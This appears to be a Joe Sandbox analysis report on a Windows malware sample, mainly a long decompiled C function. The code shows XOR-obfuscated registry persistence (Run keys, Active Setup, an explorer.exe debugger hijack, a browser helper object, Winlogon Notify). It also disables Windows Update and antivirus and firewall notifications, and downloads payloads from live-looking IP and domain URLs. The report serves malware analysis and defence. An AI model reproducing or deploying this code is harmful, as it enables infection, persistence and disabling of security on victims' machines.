Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$Create$CloseValuelstrcpylstrlen$HandleWritelstrcat$AttributesComputerDeleteDirectoryMutexNameObjectSingleSleepSystemTimeWaitwsprintf
String ID: Debugger$QlC5hT0yHn63XEm5LqJ2OxSkGj2v$SOFTWARE\Microsoft\Active Setup\Installed Components\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$f${%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}${1A59D3E9-9D17-EB65-EA3F-071C953972C0}${38383738-3439-3838-3738-343938383738}
API String ID: 601675314-897873557
Opcode ID: e3e4334ff5222c92f0c501c8ba27e48368c3fb2e37427e098998a6b67b5dfe63
Instruction ID: 54dbcc9571b8fe088a9b1486dd0164562ca2f985fb6eb90898113ffa304c7d2c
Opcode Fuzzy Hash: e3e4334ff5222c92f0c501c8ba27e48368c3fb2e37427e098998a6b67b5dfe63
Instruction Fuzzy Hash: 9981BFB1108785A9D731E7608C85FEF7AEC9B85304F50482BB6C9F60C2D67C96458B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004042A2 Relevance: 58.0, APIs: 30, Strings: 3, Instructions: 203
filestringtimeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004042A2() {
				void* _t361;
				void* _t363;
				void* _t366;
				signed char* _t368;
				int _t371;
				signed char* _t390;
				int _t393;
				void* _t395;
				int _t396;
				int _t397;
				void* _t401;
				int _t402;
				int _t403;
				CHAR* _t406;
				int _t408;
				long _t409;
				CHAR* _t410;
				int _t412;
				long _t413;
				CHAR* _t418;
				void* _t420;
				CHAR* _t421;
				void* _t423;
				signed char* _t433;
				int _t434;
				void* _t437;
				signed char* _t439;
				int _t442;
				int _t443;
				int _t449;
				int _t450;
				int _t455;
				int _t460;
				int _t462;
				void* _t464;
				int _t468;
				void* _t470;
				int _t475;
				long _t479;
				int _t480;
				int _t486;
				int _t488;
				int _t491;
				int _t498;
				int _t500;
				int _t502;
				int _t507;
				int _t510;
				int _t512;
				int _t515;
				int _t517;
				void* _t521;
				int _t526;
				int _t528;
				int _t530;
				int _t534;
				void* _t535;
				void* _t537;
				signed char* _t538;
				signed char* _t539;
				int _t540;
				signed char* _t541;
				signed char* _t542;
				signed char* _t543;
				signed char* _t544;
				signed char* _t545;
				int _t546;
				signed char* _t547;
				int _t548;
				char* _t550;
				CHAR* _t551;
				int _t555;
				int _t557;
				int _t560;
				void* _t574;
				int _t575;
				int _t578;
				CHAR* _t584;
				int _t586;
				long _t587;
				int _t592;
				int _t600;
				int _t601;
				signed char _t609;
				int _t615;
				int _t619;
				void* _t621;
				int _t622;
				void* _t625;
				signed char _t636;
				int _t637;
				signed char* _t638;
				void* _t639;
				void* _t641;
				int _t646;
				void* _t648;
				void* _t649;
				long* _t650;
				signed int* _t653;
				long _t663;
				int _t664;
				signed char _t674;
				void* _t677;
				int _t679;
				int _t680;
				signed char* _t681;
				void* _t682;
				void* _t684;
				int _t687;
				void* _t689;
				void* _t690;
				void* _t691;
				signed int* _t694;
				void* _t703;
				int _t704;
				signed char _t714;
				int _t722;
				CHAR* _t724;
				void* _t730;
				void* _t737;
				CHAR* _t742;
				CHAR* _t752;
				CHAR* _t753;
				char* _t754;
				CHAR* _t755;
				CHAR* _t756;
				CHAR* _t757;
				CHAR* _t758;
				CHAR* _t759;
				CHAR* _t760;
				CHAR* _t761;
				long* _t762;
				void** _t763;
				char* _t764;
				char* _t765;
				CHAR* _t766;
				int _t769;
				char* _t770;
				char* _t772;
				char* _t773;
				char* _t774;
				long* _t775;
				CHAR* _t776;
				int _t777;
				CHAR* _t778;
				CHAR* _t779;
				void* _t780;
				signed int* _t782;
				char* _t783;
				void* _t784;
				CHAR* _t785;
				CHAR* _t786;
				void* _t787;
				signed int* _t789;
				char* _t790;
				CHAR* _t791;
				struct _STARTUPINFOA* _t792;
				void* _t793;
				void* _t794;
				signed char _t795;
				long* _t799;
				long* _t800;
				int _t801;
				void* _t803;
				long _t804;
				long _t805;
				void* _t806;
				signed int* _t830;
				signed char* _t831;
				signed char* _t832;
				signed int* _t834;
				signed int* _t837;
				char* _t842;
				signed char* _t843;
				void* _t844;
				void* _t845;
				long _t846;
				signed int* _t847;
				void** _t848;
				int _t850;
				void** _t851;
				void** _t852;
				char* _t853;
				CHAR* _t854;
				signed char* _t855;
				long* _t856;
				signed int* _t857;
				void* _t858;
				void* _t859;
				char* _t860;
				signed int* _t861;
				void* _t862;
				char* _t863;
				signed int* _t864;
				CHAR* _t866;
				long _t867;
				struct _FILETIME* _t868;
				void* _t869;
				long* _t870;

				_t361 = CreateFileA(_t752, 0x80000000, 1, 0, 3, 0, 0); // executed
				 *(_t869 + 0xa0) = _t361;
				_t803 = _t361;
				if(_t361 != 0xffffffff) {
					GetFileTime(_t803, _t869 + 0x84, _t869 + 0x88, _t869 + 0x8c);
					CloseHandle( *(_t869 + 0xa0));
					 *(_t869 + 0xc) = 1;
				}
				if( *((intOrPtr*)(_t869 + 0x1c)) != 0) {
					L20:
					_t363 = CreateFileA(_t869 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
					 *(_t869 + 0xa0) = _t363;
					if(_t363 == 0 || _t363 == 0xffffffff) {
						 *(_t869 + 0x14) = 0;
						_t867 = 0;
						__eflags = 0;
					} else {
						_t867 = GetFileSize(_t363, 0);
						 *(_t869 + 0x14) = E00401000(_t717);
						ReadFile( *(_t869 + 0xb0),  *(_t869 + 0x20), _t867, _t869 + 0xa0, 0); // executed
						CloseHandle( *(_t869 + 0xa0));
					}
					_t366 = CreateThread(0, 0x1000, E00401038, _t869 + 0x1570, 0, _t869 + 0x9c); // executed
					CloseHandle(_t366);
					_t368 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
					while(_t368 < 0x408776) {
						 *_t368 =  *_t368 ^ 0x000000d4;
						_t368 =  &(_t368[1]);
					}
					while(1) {
						__eflags = 0x407b20 - "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe";
						if(0x407b20 >= "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe") {
							break;
						}
						 *0x407b20 =  *0x407b20 ^ 0x0000004d;
						__eflags =  *0x407b20;
						 *(_t867 + 0x40) =  *(_t867 + 0x40) ^ _t795;
					}
					__eflags =  *0x412100 - 2;
					if( *0x412100 != 2) {
						L56:
						 *(_t869 + 0x78) = 0x10;
						_t753 = _t869 + 0x1ec;
						_t371 = GetComputerNameA(_t753, _t869 + 0x78); // executed
						__eflags = _t371;
						if(_t371 == 0) {
							L58:
							_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
							_push(_t869 + 0x1bc);
							L00405E20();
							L62:
							wsprintfA("{38383738-3439-3838-3738-343938383738}", "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t869 + 0x1f4)),  *((char*)(_t869 + 0x1f1)),  *((char*)(_t869 + 0x1ee)),  *((char*)(_t869 + 0x1eb)),  *((char*)(_t869 + 0x1e8)),  *((char*)(_t869 + 0x1e5)),  *((char*)(_t869 + 0x1e2)),  *((char*)(_t869 + 0x1df)),  *((char*)(_t869 + 0x1dc)),  *((char*)(_t869 + 0x1d9)),  *((char*)(_t869 + 0x1d6)),  *((char*)(_t869 + 0x1d3)),  *((char*)(_t869 + 0x1d0)),  *((char*)(_t869 + 0x1cd)),  *((char*)(_t869 + 0x1ca)),  *((char*)(_t869 + 0x1c7)));
							_t870 = _t869 + 0x48;
							_t390 = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
							while(1) {
								__eflags = _t390 - 0x407ad5;
								if(_t390 >= 0x407ad5) {
									break;
								}
								 *_t390 =  *_t390 ^ 0x000000d4;
								_t390 =  &(_t390[1]);
							}
							while(1) {
								__eflags = 0x4072a0 - "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\";
								if(0x4072a0 >= "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\") {
									break;
								}
								 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
								__eflags =  *0x4072a0;
								 *(_t867 + 0x40) =  *(_t867 + 0x40) ^ _t795;
							}
							_push("{38383738-3439-3838-3738-343938383738}");
							_push("SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\");
							_t754 =  &(_t870[0x410]);
							_push(_t754);
							L00405E20();
							_push(0x4072a0);
							L00405E30();
							_t393 = RegCreateKeyA(0x80000002, _t754,  &(_t870[0x26])); // executed
							__eflags = _t393;
							if(_t393 != 0) {
								L93:
								_t395 = E004030DE( &(_t870[0x1ee]));
								_t870[0x26] = _t395;
								__eflags = _t395;
								if(_t395 == 0) {
									L113:
									_t396 = E004010B2();
									__eflags = _t396;
									_t804 = _t396;
									if(_t396 == 0) {
										_t804 = 0x42;
									}
									_t870[0x1ee] = _t804;
									_t397 = E004010B2();
									__eflags = _t397;
									_t805 = _t397;
									if(_t397 == 0) {
										_t805 = 0x4d;
									}
									_t870[0x162] = _t805;
									_push( *0x4120b0);
									_push( &(_t870[0x163]));
									L00405E20();
									_push( &(_t870[0x55a]));
									_push( &(_t870[0x1ac]));
									L00405E20();
									_t847 = _t870[5];
									_t401 = _t847 + _t867;
									while(1) {
										__eflags = _t847 - _t401;
										if(_t847 >= _t401) {
											break;
										}
										 *_t847 =  *_t847 ^ _t870[0x162] & 0x000000ff;
										_t847 =  &(_t847[0]);
										_t401 = _t870[5] + _t867;
									}
									_t755 =  &(_t870[0x517]);
									_t402 = ExpandEnvironmentStringsA("%AppData%\\", _t755, 0x104);
									__eflags = _t402;
									if(_t402 == 0) {
										L124:
										_t756 =  &(_t870[0x516]);
										_t403 = GetTempPathA(0x104, _t756);
										__eflags = _t403;
										if(_t403 == 0) {
											L132:
											E00401029(_t870[5]);
											_t757 =  &(_t870[0x387]);
											_t406 = GetSystemDirectoryA(_t757, 0x104);
											_push(0x80);
											_push( *0x4120c0);
											_push(0x41103e);
											_push(_t757);
											L00405E30();
											L00405E30();
											SetFileAttributesA(_t406, _t406); // executed
											_t408 = CreateFileA(_t757, 0x40000000, 0, 0, 2, 0x80, 0); // executed
											_t870[0x28] = _t408;
											__eflags = _t408;
											if(_t408 == 0) {
												L139:
												_t409 = GetLastError();
												__eflags = _t409 - 0x20;
												if(_t409 != 0x20) {
													_t758 =  &(_t870[0x387]);
													_t410 = ExpandEnvironmentStringsA("%AppData%\\", _t758, 0x104);
													_push(0x80);
													_push( *0x4120c0);
													L00405E30();
													SetFileAttributesA(_t410, _t758);
													_t412 = CreateFileA(_t758, 0x40000000, 0, 0, 2, 0x80, 0);
													_t870[0x28] = _t412;
													__eflags = _t412;
													if(_t412 == 0) {
														L143:
														_t413 = GetLastError();
														__eflags = _t413 - 0x20;
														if(_t413 == 0x20) {
															goto L140;
														}
														_t584 = GetTempPathA(0x104, _t758);
														_push(0x80);
														_push( *0x4120c0);
														L00405E30();
														SetFileAttributesA(_t584, _t758);
														_t586 = CreateFileA(_t758, 0x40000000, 0, 0, 2, 0x80, 0);
														_t870[0x28] = _t586;
														__eflags = _t586;
														if(_t586 == 0) {
															L146:
															_t587 = GetLastError();
															__eflags = _t587 - 0x20;
															if(_t587 == 0x20) {
																goto L140;
															}
															L149:
															_t759 =  &(_t870[0x343]);
															_t418 = ExpandEnvironmentStringsA("%AppData%\\", _t759, 0x104);
															_push(0x80);
															_push( *0x4120d0);
															L00405E30();
															SetFileAttributesA(_t418, _t759); // executed
															_t420 = CreateFileA(_t759, 0x40000000, 0, 0, 2, 0x80, 0); // executed
															_t870[0x28] = _t420;
															__eflags = _t420;
															_t806 = _t420;
															if(_t420 == 0) {
																L151:
																_t760 =  &(_t870[0x342]);
																_t421 = GetTempPathA(0x104, _t760);
																_push(0x80);
																_push( *0x4120d0);
																L00405E30();
																SetFileAttributesA(_t421, _t760);
																_t423 = CreateFileA(_t760, 0x40000000, 0, 0, 2, 0x80, 0);
																_t870[0x28] = _t423;
																__eflags = _t423;
																_t806 = _t423;
																if(_t423 == 0) {
																	L154:
																	_t870[0x342] = 0;
																	L155:
																	__eflags = _t870[0x342];
																	if(_t870[0x342] != 0) {
																		CreateFileA( &(_t870[0x348]), 0x80000000, 1, 0, 3, 0, 0); // executed
																	}
																	_t761 =  &(_t870[0x2b]);
																	GetSystemDirectoryA(_t761, 0x104);
																	_push(0x41103e);
																	_push(_t761);
																	L00405E30();
																	E004012C2(_t761);
																	ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t761, 0x104);
																	E004012C2(_t761);
																	ExpandEnvironmentStringsA("%AppData%\\", _t761, 0x104);
																	E004012C2(_t761);
																	_t433 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
																	while(1) {
																		__eflags = _t433 - 0x40724d;
																		if(_t433 >= 0x40724d) {
																			break;
																		}
																		 *_t433 =  *_t433 ^ 0x000000d4;
																		_t433 =  &(_t433[1]);
																	}
																	_t434 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &(_t870[0x26])); // executed
																	__eflags = _t434;
																	if(_t434 == 0) {
																		L162:
																		__eflags = _t870[0xb];
																		if(_t870[0xb] == 0) {
																			_t774 =  &(_t870[0x55a]);
																			_t574 = E00401251(_t870[0x26]);
																			_push(_t774);
																			L00405E40();
																			_t575 = _t574 + 1;
																			__eflags = _t575;
																			RegSetValueExA(_t870[0x2b],  *0x4120b0, 0, 1, _t774, _t575);
																		}
																		RegDeleteValueA(_t870[0x27], "winrnt.exe"); // executed
																		RegCloseKey(_t870[0x26]); // executed
																		L165:
																		__eflags =  *0x412100 - 2;
																		if( *0x412100 != 2) {
																			L205:
																			_t437 = CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t870[0x27])); // executed
																			CloseHandle(_t437);
																			_t439 = "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}";
																			while(1) {
																				__eflags = _t439 - 0x407060;
																				if(_t439 >= 0x407060) {
																					break;
																				}
																				 *_t439 =  *_t439 ^ 0x000000d4;
																				_t439 =  &(_t439[1]);
																			}
																			_t870[0xc] = 0;
																			while(1) {
																				E004011CF(0x80000002, "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}");
																				__eflags = _t870[0xc] - 9;
																				if(_t870[0xc] <= 9) {
																					goto L244;
																				}
																				_t870[0x16] = 0;
																				_t870[0x17] = 0;
																				_t498 = E004025C3();
																				__eflags = _t498;
																				if(_t498 != 0) {
																					L241:
																					 *_t870 = 0;
																					L245:
																					_t870[0xd] = 0x3b;
																					do {
																						__eflags = _t870[0x342];
																						if(_t870[0x342] != 0) {
																							_push(0);
																							_push("opera.exe");
																							_push("seamonkey.exe");
																							_push("mozilla.exe");
																							_push("firefox.exe");
																							_push("iexplore.exe");
																							_push("explorer.exe");
																							E0040318D( &(_t870[0x349]));
																							_t870 =  &(_t870[8]);
																						}
																						__eflags = _t870[0xa];
																						if(_t870[0xa] != 0) {
																							_t765 =  &(_t870[0x3cb]);
																							SetFileAttributesA(_t765, 0x21); // executed
																							_t475 = RegCreateKeyA(0x80000002,  &(_t870[0x40f]),  &(_t870[0x26])); // executed
																							__eflags = _t475;
																							if(_t475 == 0) {
																								E00401251(_t870[0x26]);
																								_t870[0x27] = 1;
																								_t479 = RegSetValueExA(_t870[0x2b], "IsInstalled", 0, 4,  &(_t870[0x28]), 4); // executed
																								_push(_t765);
																								L00405E40();
																								_t480 = _t479 + 1;
																								__eflags = _t480;
																								RegSetValueExA(_t870[0x2b], "StubPath", 0, 1, _t765, _t480); // executed
																								RegCloseKey(_t870[0x26]); // executed
																							}
																						}
																						__eflags = _t870[0xb];
																						_t848 =  &(_t870[0x26]);
																						if(_t870[0xb] == 0) {
																							_t442 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t848);
																							__eflags = _t442;
																							if(_t442 == 0) {
																								L256:
																								_t762 =  &(_t870[0x55a]);
																								_push(_t762);
																								L00405E40();
																								_t443 = _t442 + 1;
																								__eflags = _t443;
																								_push(_t443);
																								_push(_t762);
																								_push(1);
																								_push(0);
																								_push( *0x4120b0);
																								goto L257;
																							}
																							_t442 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t848);
																							__eflags = _t442;
																							if(_t442 != 0) {
																								goto L258;
																							}
																							goto L256;
																						} else {
																							_t766 =  &(_t870[0x48f]);
																							SetFileAttributesA(_t766, 0x21); // executed
																							_t449 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t848); // executed
																							__eflags = _t449;
																							if(_t449 != 0) {
																								L258:
																								__eflags = _t870[9];
																								if(_t870[9] == 0) {
																									goto L268;
																								}
																								_t763 =  &(_t870[0x27]);
																								_t450 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t763, 0); // executed
																								__eflags = _t450;
																								if(_t450 == 0) {
																									L261:
																									RegSetValueExA(_t870[0x2b], "SubshellState", 0, 3,  &(_t870[0x1ef]), 0x22a); // executed
																									RegCloseKey(_t870[0x26]); // executed
																									L262:
																									_t764 =  &(_t870[0x387]);
																									SetFileAttributesA(_t764, 0x21); // executed
																									__eflags =  *0x412100 - 2;
																									_t851 =  &(_t870[0x26]);
																									if( *0x412100 != 2) {
																										_t455 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t851);
																										__eflags = _t455;
																										if(_t455 != 0) {
																											goto L268;
																										}
																										_push(_t764);
																										L00405E40();
																										RegSetValueExA(_t870[0x2b], 0, 0, 1, _t764, _t455 + 1);
																										RegSetValueExA(_t870[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																										RegCloseKey(_t870[0x26]);
																										_t460 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t851);
																										__eflags = _t460;
																										if(_t460 != 0) {
																											goto L268;
																										}
																										L267:
																										RegCloseKey(_t870[0x26]); // executed
																										goto L268;
																									}
																									_t462 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t851); // executed
																									__eflags = _t462;
																									if(_t462 != 0) {
																										goto L268;
																									}
																									_t464 = E00401251(_t870[0x26]);
																									_push(_t764);
																									L00405E40();
																									RegSetValueExA(_t870[0x2b], "DLLName", 0, 1, _t764, _t464 + 1); // executed
																									RegSetValueExA(_t870[0x2b], "Startup", 0, 1, "Startup", 8); // executed
																									goto L267;
																								}
																								_t468 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t763, 0);
																								__eflags = _t468;
																								if(_t468 != 0) {
																									goto L262;
																								}
																								goto L261;
																							}
																							_t470 = E00401251(_t870[0x26]);
																							_push(_t766);
																							L00405E40();
																							_push(_t470 + 1);
																							_push(_t766);
																							_push(1);
																							_push(0);
																							_push("Debugger");
																							L257:
																							RegSetValueExA(_t870[0x2b], ??, ??, ??, ??, ??); // executed
																							RegCloseKey(_t870[0x26]); // executed
																							goto L258;
																						}
																						L268:
																						SetFileAttributesA( &(_t870[0x55b]), 0x21); // executed
																						Sleep(0x3e8); // executed
																						_t348 =  &(_t870[0xd]);
																						 *_t348 = _t870[0xd] - 1;
																						__eflags =  *_t348;
																					} while ( *_t348 >= 0);
																					_t486 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t870[0x12]), 0);
																					__eflags = _t486;
																					if(_t486 == 0) {
																						_t870[0x10] = 4;
																						_t770 =  &(_t870[0x10]);
																						_t488 = RegQueryValueExA(_t870[0x16], "g00d d0gg", 0, 0, _t770,  &(_t870[0x10]));
																						__eflags = _t488;
																						if(_t488 == 0) {
																							_t491 = _t870[0xf] - 1;
																							__eflags = _t491;
																							_t870[0xf] = _t491;
																							if(_t491 == 0) {
																								RegDeleteValueA(_t870[0x12], "g00d d0gg");
																								Sleep(0x1388);
																								__eflags =  *0x412100 - 2;
																								if( *0x412100 != 2) {
																									ExitWindowsEx(6, 0);
																								} else {
																									RtlAdjustPrivilege(0x13, 1, 0,  &(_t870[0xe]));
																									 *0x412240(1);
																								}
																							} else {
																								RegSetValueExA(_t870[0x16], "g00d d0gg", 0, 4, _t770, 4);
																							}
																						}
																						RegCloseKey(_t870[0x11]);
																					}
																					continue;
																				}
																				_t500 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t870[0x1c]), 0);
																				__eflags = _t500;
																				if(_t500 != 0) {
																					__eflags =  *_t870;
																					if( *_t870 == 0) {
																						goto L245;
																					}
																					L243:
																					_t870[0xc] = 0;
																					goto L245;
																				}
																				_t868 =  &(_t870[0x19]);
																				GetSystemTimeAsFileTime(_t868);
																				_t870[0x18] = 8;
																				_t842 =  &(_t870[0x17]);
																				_t502 = RegQueryValueExA(_t870[0x20], "ConnPred", 0,  &(_t870[0x17]), _t842,  &(_t870[0x18]));
																				__eflags = _t502;
																				if(_t502 != 0) {
																					L214:
																					__eflags = E004014D8(_t868, 0x412070) - 0x4af;
																					if(__eflags <= 0) {
																						L225:
																						__eflags =  *0x412080;
																						if( *0x412080 == 0) {
																							L228:
																							_t870[0x18] = 8;
																							__eflags = RegQueryValueExA(_t870[0x20], "UseExtProfile", 0,  &(_t870[0x17]), _t842,  &(_t870[0x18]));
																							if(__eflags != 0) {
																								L230:
																								_t507 = E00402427(__eflags);
																								__eflags = _t507;
																								if(_t507 != 0) {
																									L240:
																									RegCloseKey(_t870[0x1b]);
																									goto L241;
																								}
																								_push(1);
																								_push(0);
																								_t510 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																								__eflags = _t510;
																								if(_t510 == 0) {
																									L233:
																									_t870[0x18] = 8;
																									_t768 =  &(_t870[0x13]);
																									_t512 = RegQueryValueExA(_t870[0x20], "UseDflProfile", 0,  &(_t870[0x17]),  &(_t870[0x13]),  &(_t870[0x18]));
																									__eflags = _t512;
																									if(_t512 != 0) {
																										_t521 = _t870[0x16] + 0x1162f100;
																										__eflags = _t521;
																										asm("adc edx, 0xffffff9b");
																										_t870[0x12] = _t521;
																										_t870[0x13] = _t870[0x17];
																									}
																									__eflags = E004014D8( &(_t870[0x19]), _t768) - 0x152ab;
																									if(__eflags <= 0) {
																										goto L240;
																									} else {
																										_t515 = E00402427(__eflags);
																										__eflags = _t515;
																										if(_t515 != 0) {
																											goto L240;
																										}
																										_push(3);
																										_push(0);
																										_t517 = E0040211B("tombul.gif", 0);
																										__eflags = _t517;
																										if(_t517 == 0) {
																											goto L240;
																										}
																										_push(8);
																										_push(_t868);
																										_push(0xb);
																										_push(0);
																										_push("UseDflProfile");
																										L239:
																										RegSetValueExA(_t870[0x20], ??, ??, ??, ??, ??);
																										RegCloseKey(_t870[0x1b]);
																										 *_t870 = 1;
																										goto L243;
																									}
																								}
																								_t870[0x16] = _t870[0x19].dwLowDateTime;
																								_t870[0x17] = _t870[0x1a];
																								_push(8);
																								_push(_t868);
																								_push(0xb);
																								_push(0);
																								_push("UseExtProfile");
																								goto L239;
																							}
																							__eflags = E004014D8( &(_t870[0x19]),  &(_t870[0x16])) - 0x152ab;
																							if(__eflags <= 0) {
																								goto L233;
																							}
																							goto L230;
																						}
																						_push(3);
																						_push(0);
																						_t526 = E0040211B("grazie.gif", 0);
																						__eflags = _t526;
																						if(_t526 == 0) {
																							goto L228;
																						}
																						_t870[0x16] = _t870[0x19].dwLowDateTime;
																						_t870[0x17] = _t870[0x1a];
																						_push(8);
																						_push(_t868);
																						_push(0xb);
																						_push(0);
																						_push("ConnPred");
																						goto L239;
																					}
																					_t528 = E00402427(__eflags);
																					__eflags = _t528;
																					if(_t528 != 0) {
																						goto L240;
																					}
																					_t530 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																					_t850 = 0;
																					__eflags = _t530;
																					_t769 = _t530;
																					if(_t530 != 0) {
																						_t535 = E00401E00(_t530,  &(_t870[0x15]), 2);
																						__eflags = _t535 - 2;
																						if(_t535 == 2) {
																							_t850 = 1;
																						}
																					}
																					E00401F59(_t769);
																					__eflags = _t850;
																					if(_t850 == 0) {
																						 *0x412080 = 0;
																					} else {
																						 *0x412070 = _t870[0x19];
																						_t534 = 0;
																						__eflags = _t870[0x14] - 0x49;
																						 *0x412074 = _t870[0x1a];
																						if(_t870[0x14] == 0x49) {
																							__eflags = _t870[0x14] - 0x54;
																							if(_t870[0x14] == 0x54) {
																								_t534 = 1;
																							}
																						}
																						 *0x412080 = _t534;
																					}
																					goto L225;
																				}
																				_t537 = E004014D8(_t868, _t842);
																				__eflags = _t537 - 0x152ab;
																				if(_t537 <= 0x152ab) {
																					goto L228;
																				}
																				goto L214;
																				L244:
																				_t311 =  &(_t870[0xc]);
																				 *_t311 = _t870[0xc] + 1;
																				__eflags =  *_t311;
																				goto L245;
																			}
																		}
																		_t538 = "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU";
																		while(1) {
																			__eflags = _t538 - 0x407214;
																			if(_t538 >= 0x407214) {
																				break;
																			}
																			 *_t538 =  *_t538 ^ 0x000000d4;
																			_t538 =  &(_t538[1]);
																		}
																		_t539 = "NoAutoUpdate";
																		while(1) {
																			__eflags = _t539 - 0x4071cf;
																			if(_t539 >= 0x4071cf) {
																				break;
																			}
																			 *_t539 =  *_t539 ^ 0x000000d4;
																			_t539 =  &(_t539[1]);
																		}
																		_t852 =  &(_t870[0x26]);
																		_t540 = RegCreateKeyA(0x80000002, "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", _t852); // executed
																		__eflags = _t540;
																		if(_t540 == 0) {
																			RegSetValueExA(_t870[0x2b], "NoAutoUpdate", 0, 4,  &(_t870[0x28]), 4); // executed
																			RegCloseKey(_t870[0x26]);
																		}
																		_t541 = "SOFTWARE\\Microsoft\\Security Center";
																		while(1) {
																			__eflags = _t541 - 0x4071c2;
																			if(_t541 >= 0x4071c2) {
																				break;
																			}
																			 *_t541 =  *_t541 ^ 0x000000d4;
																			_t541 =  &(_t541[1]);
																		}
																		_t542 = "AntiVirusOverride";
																		while(1) {
																			__eflags = _t542 - 0x407188;
																			if(_t542 >= 0x407188) {
																				break;
																			}
																			 *_t542 =  *_t542 ^ 0x000000d4;
																			_t542 =  &(_t542[1]);
																		}
																		_t543 = "AntiVirusDisableNotify";
																		while(1) {
																			__eflags = _t543 - 0x407176;
																			if(_t543 >= 0x407176) {
																				break;
																			}
																			 *_t543 =  *_t543 ^ 0x000000d4;
																			_t543 =  &(_t543[1]);
																		}
																		_t544 = "FirewallDisableNotify";
																		while(1) {
																			__eflags = _t544 - 0x40715f;
																			if(_t544 >= 0x40715f) {
																				break;
																			}
																			 *_t544 =  *_t544 ^ 0x000000d4;
																			_t544 =  &(_t544[1]);
																		}
																		_t545 = "UpdatesDisableNotify";
																		while(1) {
																			__eflags = _t545 - 0x407149;
																			if(_t545 >= 0x407149) {
																				break;
																			}
																			 *_t545 =  *_t545 ^ 0x000000d4;
																			_t545 =  &(_t545[1]);
																		}
																		_t546 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006, _t852); // executed
																		__eflags = _t546;
																		if(_t546 == 0) {
																			_t773 =  &(_t870[0x28]);
																			RegSetValueExA(_t870[0x2b], "AntiVirusOverride", 0, 4, _t773, 4); // executed
																			RegSetValueExA(_t870[0x2b], "AntiVirusDisableNotify", 0, 4, _t773, 4); // executed
																			RegSetValueExA(_t870[0x2b], "FirewallDisableNotify", 0, 4, _t773, 4); // executed
																			RegSetValueExA(_t870[0x2b], "UpdatesDisableNotify", 0, 4, _t773, 4); // executed
																			RegCloseKey(_t870[0x26]); // executed
																		}
																		_t547 = "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
																		while(1) {
																			__eflags = _t547 - 0x407134;
																			if(_t547 >= 0x407134) {
																				break;
																			}
																			 *_t547 =  *_t547 ^ 0x000000d4;
																			_t547 =  &(_t547[1]);
																		}
																		_t548 = RegOpenKeyExA(0x80000002, "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0x2001f, _t852); // executed
																		__eflags = _t548;
